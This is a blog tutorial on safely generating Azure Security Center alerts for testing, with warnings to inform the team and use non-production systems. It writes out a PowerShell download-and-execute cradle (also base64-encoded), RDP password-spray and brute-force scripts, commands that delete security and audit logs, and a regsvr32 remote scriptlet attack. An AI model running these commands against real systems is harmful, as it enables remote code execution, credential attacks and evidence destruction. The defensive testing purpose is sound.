Simulate alerts to be caught by ASC

I got a question from my friend about how to safely create alerts in order to test Azure Security Center. He wanted to test several automation capabilities such as Azure Sentinel, ASC playbook with Logic App or any form of security orchestration & automation.

In this article, I'd like to share a few ways to safely create High and Medium severity alerts in Azure Security Center, for the case where your organization doesn't have a Red Team or the Red Team is not currently involved.

Before running any simulation, your team should be informed. The simulation should also be run in a non-production subscription.

Follow Microsoft Alert Validation Guidance

Microsoft's guidance shows how to create a test alert by simply popping up the Calculator application.

Suspicious PowerShell Activity Detected

One of the most common malware techniques today is file-less execution. If you run a PowerShell script that looks suspicious, ASC raises a High severity alert. Take a look at the following command:

PowerShell -ExecutionPolicy bypass -noprofile -command (New-Object System.Net.WebClient).DownloadFile("http://something/someone", "$env:APPDATA\hl.ps1" );Start-Process( "$env:APPDATA\hl.ps1" )

You may get nothing if you execute this one, because the URL in the command line cannot be resolved, and no alert should be raised. However, if you encode it into base64:

UG93ZXJTaGVsbCAtRXhlY3V0aW9uUG9saWN5IGJ5cGFzcyAtbm9wcm9maWxlIC1jb21tYW5kIChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly80MC43OC42OC41Ny9ub2ZpbGUiLCAiJGVudjpUTVBcaGwuZXhlIiApOyBTdGFydC1Qcm9jZXNzKCIkZW52OlRNUFxobC5leGUiKQ==

and execute it with -EncodedCommand:

powershell.exe -enc UG93ZXJTaGVsbCAtRXhlY3V0aW9uUG9saWN5IGJ5cGFzcyAtbm9wcm9maWxlIC1jb21tYW5kIChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly80MC43OC42OC41Ny9ub2ZpbGUiLCAiJGVudjpUTVBcaGwuZXhlIiApOyBTdGFydC1Qcm9jZXNzKCIkZW52OlRNUFxobC5leGUiKQ==

You will get caught by Azure Security Center.
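From the detection side, the interesting property of this alert is that the command line only looks harmless because it is encoded. The following helper, an added example that is not part of the original post, decodes an -EncodedCommand argument and matches the indicators present in the command above; the indicator list and the "two or more hits" threshold are constructed for illustration and are not ASC's real detection logic, and the sample command uses a placeholder URL rather than the post's.

```python
import base64
import binascii
import re

# Indicators taken from the post's command; list and threshold are
# constructed for illustration, not ASC's real detection logic.
INDICATORS = {
    "execution_policy_bypass": re.compile(r"-ExecutionPolicy\s+bypass", re.I),
    "no_profile": re.compile(r"-nop(rofile)?\b", re.I),
    "download_file": re.compile(r"\.DownloadFile\(", re.I),
    "start_process": re.compile(r"Start-Process", re.I),
}
# powershell.exe accepts any unambiguous prefix of -EncodedCommand
ENC_FLAGS = {"-e", "-ec", "-en", "-enc", "-enco", "-encodedcommand"}

def decode_encoded_command(b64):
    """Decode -EncodedCommand: PowerShell expects UTF-16LE, pasted samples are often UTF-8."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except binascii.Error:
        return None
    for codec in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(codec)
        except UnicodeDecodeError:
            continue
        # wrong codec yields non-ASCII garbage; a PowerShell one-liner is ASCII
        if all(32 <= ord(c) < 127 or c in "\r\n\t" for c in text):
            return text
    return None

def analyze_command_line(cmdline):
    """Decode any -enc payload, match indicators, return a verdict."""
    tokens = cmdline.split()
    script = cmdline
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ENC_FLAGS:
            decoded = decode_encoded_command(tokens[i + 1])
            if decoded is not None:
                script = decoded
            break
    hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    return {"decoded": script, "indicators": hits, "suspicious": len(hits) >= 2}

# Constructed sample modelled on the post's command (placeholder URL, not the post's)
SAMPLE = ('PowerShell -ExecutionPolicy bypass -noprofile -command (New-Object '
          'System.Net.WebClient).DownloadFile("http://example.invalid/nofile", '
          '"$env:TMP\\hl.exe"); Start-Process("$env:TMP\\hl.exe")')
UTF16_CMD = "powershell.exe -enc " + base64.b64encode(SAMPLE.encode("utf-16-le")).decode()
UTF8_CMD = "powershell.exe -enc " + base64.b64encode(SAMPLE.encode("utf-8")).decode()
```

Note that the base64 shown in the post is UTF-8 rather than the UTF-16LE that powershell.exe expects, which is why the helper tries both encodings.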

Expose your virtual machine to Internet

The second way is to make your virtual machine visible to the Internet without protection. A few conditions must be met:

  • The virtual machine has a Public IP address associated.
  • The virtual machine doesn't block incoming SSH (22) or RDP (3389) traffic.
  • The virtual machine is not placed behind any load balancer or security perimeter.

Before trying this way, again your team should be informed. The virtual machine should also be deployed in an isolated virtual network that is not peered with any other virtual network in your environment. You do need to watch the virtual machine continuously, because once it is compromised it can be abused as a staging point to attack the main target.

Once the virtual machine has been scanned and noticed by a bad actor, it will receive password spray and brute-force attacks. Below are common alert types raised when such a virtual machine is attacked:

  • Suspicious authentication activity
  • Failed SSH brute force attack
  • Successful RDP Brute Force Attack
  • Successful SSH Brute Force Attack
  • Suspicious incoming RDP network activity
  • Traffic detected from IP addresses recommended for blocking (formerly Traffic from unrecommended IP addresses was detected)

To spam the RDP client with a password spray, you might try the following code snippet:

$users = Get-Content -Path "C:\azsec\user.txt"
$targetIp = "40.71.18.17"
$password = "yourPassW0rd1"
foreach($user in $users){
    cmdkey /generic:TERMSRV/$targetIp /user:$user /pass:$password
    Write-Host -ForegroundColor Yellow "Connecting" $targetIp "with username: $user" "and password:" $password
    mstsc /v:$targetIp /noConsentPrompt
}

To spam RDP with a brute-force attack, use the following one:

$pws = Get-Content -Path "C:\Users\Dell\Desktop\blog\pw.txt"
$targetIp = "40.71.18.17"
$user = "admin"
foreach($pw in $pws){
    cmdkey /generic:TERMSRV/$targetIp /user:$user /pass:$pw
    Write-Host -ForegroundColor Yellow "Connecting" $targetIp "with username:" $user "and password:" $pw
    mstsc /v:$targetIp /noConsentPrompt
}

These scripts only spam RDP and may not be a perfect way to catch a successful logon (once a logon fails, the RDP client waits interactively for another password). For a more effective solution, I'd recommend enabling PSRemoting.

For a Linux virtual machine, you can write a Python script on top of the paramiko module, or use parallel SSH from a bash shell.

Create EICAR test file

EICAR is a well-known anti-virus test file. Simply copy the 68-byte string below into a *.txt file and change the extension to *.com.

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Once the file is created, Windows Defender detects it and warns you. The interesting part is that Windows Defender sends the detection signal to ASC before the alert shows up in the portal. To do that, the ASC agent is pre-integrated with Windows Defender ATP (not Windows Defender) capabilities.

If you take any action on this test file, Windows Defender also sends that information to ASC as an alert named "Antimalware Action Taken". The alert details tell you which action was taken (e.g. Blocked, Allowed).

Clear Security and Audit Log

On a Windows virtual machine, clearing the Security event log with the simple command below will get you caught by ASC:

Clear-EventLog -LogName Security

On Linux, try removing the lastlog file or the audit log directory:

rm /var/log/lastlog
rm -rf /var/log/audit

Create a Powemet like file-less attack

Powemet is malware that leverages regsvr32 to execute a malicious script. To test it, prepare a file with the *.sct extension and the following content:

<?XML version="1.0"?>
<scriptlet>
    <registration>
        <script language="JScript">
            <![CDATA[
                var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
            ]]>
        </script>
    </registration>
</scriptlet>

Upload the file to a storage account container whose access level is set to Public, so it can be fetched anonymously. Open a Windows command prompt and run the following command:

regsvr32.exe /s /u /i:https://tsstoragepublic003.blob.core.windows.net/public/azsec.sct scrobj.dll

Hopefully some of the tips above help you create ASC alerts for evaluating and testing automation capabilities (e.g. with managed services like Azure Logic Apps and Azure Functions, as well as third-party tools like ServiceNow, Slack and Microsoft Teams).

Here is what you can produce for testing

[Updated] This article describes a few ways to trigger ASC alerts for Storage: https://azsec.azurewebsites.net/2019/12/20/security-monitoring-and-detection-tips-for-your-storage-account-part-3/
